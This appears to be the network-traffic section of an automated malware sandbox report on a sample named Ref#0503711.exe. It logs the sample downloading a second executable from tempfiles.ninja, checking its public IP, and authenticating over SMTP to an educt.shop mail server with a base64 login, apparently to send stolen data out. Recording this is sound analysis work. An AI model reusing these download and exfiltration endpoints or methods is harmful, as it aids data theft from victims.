                                                              Oct 7, 2024 18:05:53.475697994 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.475720882 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.475955009 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.475960970 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.476212978 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.476432085 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.476453066 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.476521015 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.476526976 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.476584911 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.477452040 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.477474928 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.477515936 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.477515936 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.477523088 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.477591991 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.478130102 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.478300095 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.478322983 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.478389978 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.478389978 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.478395939 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.478555918 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.518807888 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.518874884 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.518980026 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.518980026 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.519009113 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.519426107 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.785887957 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.785923958 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.785974979 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.786012888 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.786039114 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.786065102 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.786207914 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.786215067 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.786411047 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.786464930 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.786503077 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.786509991 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.786523104 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.787178040 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.787218094 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.079607010 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.079631090 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.079672098 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.079678059 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.079699993 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.081037045 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.081065893 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.081099987 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.081105947 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.081129074 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.115339994 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.131736040 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.131752014 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.131798983 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.131814957 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.131819963 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.131844997 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.131860971 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.131881952 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.158775091 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.158792019 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.158828020 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.158863068 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.158889055 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.158900976 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.158926010 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.159437895 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.159461021 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.159495115 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.159501076 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.159523010 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.159534931 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.160069942 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.160089016 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.160128117 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.160132885 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.160156012 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.160173893 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.160731077 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.160748959 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.160797119 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.160803080 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.160837889 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.161386013 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.161406994 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.161443949 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.161459923 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.161464930 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.161495924 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.162910938 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.162936926 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.162981033 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.162986994 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.163009882 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.164457083 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.164478064 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.164527893 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.164535046 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.164544106 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.196470022 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:54.201374054 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:05:54.206314087 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:54.209707022 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.214359045 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.214378119 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.214412928 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.214426041 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.214533091 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.214559078 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.214587927 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.214598894 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.242065907 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242084026 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242124081 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242228985 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.242245913 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242273092 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.242281914 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.242671967 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242690086 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242714882 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.242721081 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.242748022 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.242764950 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.243340015 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.243357897 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.243410110 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.243417025 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.243457079 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.243941069 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.243957043 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.243989944 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.243994951 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.244021893 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.244036913 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.244544029 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.244561911 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.244609118 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.244615078 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.244647980 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.246334076 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.246356964 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.246413946 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.246419907 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.246454954 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.247114897 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.247133970 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.247172117 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.247178078 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.247203112 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.247216940 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.297429085 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.297462940 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.297523022 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.297540903 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.297579050 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.326754093 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.326781034 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.326922894 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.326940060 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.326982021 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.327022076 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.327037096 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.327083111 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.327090025 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.327124119 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.327773094 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.327790022 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.327828884 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.327836037 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.327874899 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.327889919 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.328438997 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.328454018 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.328507900 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.328514099 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.328551054 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.329083920 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.329097986 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.329148054 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.329155922 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.329195023 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.329426050 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.329442024 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.329483032 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.329489946 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.329525948 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.330620050 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.330634117 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.330705881 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.330714941 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.330759048 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.344960928 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.357970953 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:54.368861914 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:05:54.375176907 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:54.380228996 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.380259991 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.380326033 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.380341053 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.380387068 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.408937931 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.409024000 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.409046888 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.409439087 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.409456968 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.409495115 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.409502029 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.409532070 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.410276890 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410294056 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410378933 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.410387993 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410691023 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410706997 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410739899 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.410747051 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410772085 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.410945892 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410959959 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.410995960 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.411001921 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.411029100 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.411746979 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.411763906 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.411796093 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.411802053 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.411815882 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.412477970 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.412492990 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.412529945 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.412538052 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.412558079 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.413412094 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.413428068 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.413465023 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.413470030 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.413501978 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.416007996 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.416286945 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.491909027 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.491945028 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.492072105 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.492090940 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.492130041 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.495507002 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495527983 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495573997 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495595932 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.495613098 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495630980 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495645046 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:54.495646000 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495666027 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:54.495671034 CEST49731443192.168.2.4104.21.56.249
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 18:05:51.992147923 CEST | 56159 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 18:05:52.068525076 CEST | 53 | 56159 | 1.1.1.1 | 192.168.2.4
Oct 7, 2024 18:05:52.069196939 CEST | 57541 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 18:05:52.078591108 CEST | 53 | 57541 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 18:05:51.992147923 CEST | 192.168.2.4 | 1.1.1.1 | 0xbb61 | Standard query (0) | tempfiles.ninja | A (IP address) | IN (0x0001) | false
Oct 7, 2024 18:05:52.069196939 CEST | 192.168.2.4 | 1.1.1.1 | 0xeaea | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 18:05:52.068525076 CEST | 1.1.1.1 | 192.168.2.4 | 0xbb61 | No error (0) | tempfiles.ninja | | 104.21.56.249 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 18:05:52.068525076 CEST | 1.1.1.1 | 192.168.2.4 | 0xbb61 | No error (0) | tempfiles.ninja | | 172.67.157.59 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 18:05:52.078591108 CEST | 1.1.1.1 | 192.168.2.4 | 0xeaea | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 18:05:52.078591108 CEST | 1.1.1.1 | 192.168.2.4 | 0xeaea | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 18:05:52.078591108 CEST | 1.1.1.1 | 192.168.2.4 | 0xeaea | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                                              • tempfiles.ninja
                                                              • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 104.21.56.249 | 443 | 7392 | C:\Users\user\AppData\Local\Temp\docdd.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-07 16:05:52 UTC | 116 | OUT | GET /d/4wmb3QgRfXU5M4s2/bHzsEUNaVOT3WXU2lPvPRcIphVFu9mJr HTTP/1.1
                                                              Host: tempfiles.ninja
                                                              Connection: Keep-Alive
2024-10-07 16:05:52 UTC | 936 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 07 Oct 2024 16:05:52 GMT
                                                              Content-Type: application/x-msdownload
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              content-disposition: inline; filename=docii.exe
                                                              x-content-type-options: nosniff
                                                              permissions-policy: interest-cohort=()
                                                              x-frame-options: SAMEORIGIN
                                                              strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                              x-xss-protection: 1; mode=block
                                                              referrer-policy: no-referrer-when-downgrade
                                                              feature-policy: camera 'none'; microphone 'none'; geolocation 'none'; payment 'none'
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FKKM2csrX0uH7j0HyyWnpua91PwokOU9xD%2FFFh8IhvSEj3R1JS5CElR2z6HJO6zBBPItZq%2BdTbDyQWO1aATlZP3nYw5a%2BRH1KMN6y6O09C1cn4x%2FoE4Jug1nUQbp1rRnQtE%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8cef229c2e570cc2-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 172.67.74.152 | 443 | 7416 | C:\Users\user\Desktop\Ref#0503711.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-07 16:05:52 UTC | 155 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                              Host: api.ipify.org
                                                              Connection: Keep-Alive
2024-10-07 16:05:52 UTC | 211 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 07 Oct 2024 16:05:52 GMT
                                                              Content-Type: text/plain
                                                              Content-Length: 11
                                                              Connection: close
                                                              Vary: Origin
                                                              CF-Cache-Status: DYNAMIC
                                                              Server: cloudflare
                                                              CF-RAY: 8cef229c5de9c352-EWR
2024-10-07 16:05:52 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                              Data Ascii: 8.46.123.33


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Oct 7, 2024 18:05:54.033406019 CEST | 587 | 49733 | 162.254.34.31 | 192.168.2.4 | 220 server1.educt.shop127.0.0.1 ESMTP Postfix
Oct 7, 2024 18:05:54.033644915 CEST | 49733 | 587 | 192.168.2.4 | 162.254.34.31 | EHLO 936905
Oct 7, 2024 18:05:54.196470022 CEST | 587 | 49733 | 162.254.34.31 | 192.168.2.4 | 250-server1.educt.shop127.0.0.1
                                                              250-PIPELINING
                                                              250-SIZE 204800000
                                                              250-ETRN
                                                              250-STARTTLS
                                                              250-AUTH PLAIN LOGIN
                                                              250-AUTH=PLAIN LOGIN
                                                              250-ENHANCEDSTATUSCODES
                                                              250-8BITMIME
                                                              250-DSN
                                                              250 CHUNKING
                                                              Oct 7, 2024 18:05:54.201374054 CEST49733587192.168.2.4162.254.34.31AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                              Oct 7, 2024 18:05:54.357970953 CEST58749733162.254.34.31192.168.2.4334 UGFzc3dvcmQ6
                                                              Oct 7, 2024 18:05:54.532505989 CEST58749733162.254.34.31192.168.2.4235 2.7.0 Authentication successful
                                                              Oct 7, 2024 18:05:54.542053938 CEST49733587192.168.2.4162.254.34.31MAIL FROM:<sendxambro@educt.shop>
                                                              Oct 7, 2024 18:05:54.700805902 CEST58749733162.254.34.31192.168.2.4250 2.1.0 Ok
                                                              Oct 7, 2024 18:05:54.700965881 CEST49733587192.168.2.4162.254.34.31RCPT TO:<ambro@educt.shop>
                                                              Oct 7, 2024 18:05:55.862061977 CEST58749733162.254.34.31192.168.2.4250 2.1.5 Ok
                                                              Oct 7, 2024 18:05:55.862219095 CEST49733587192.168.2.4162.254.34.31DATA
                                                              Oct 7, 2024 18:05:56.018927097 CEST58749733162.254.34.31192.168.2.4354 End data with <CR><LF>.<CR><LF>
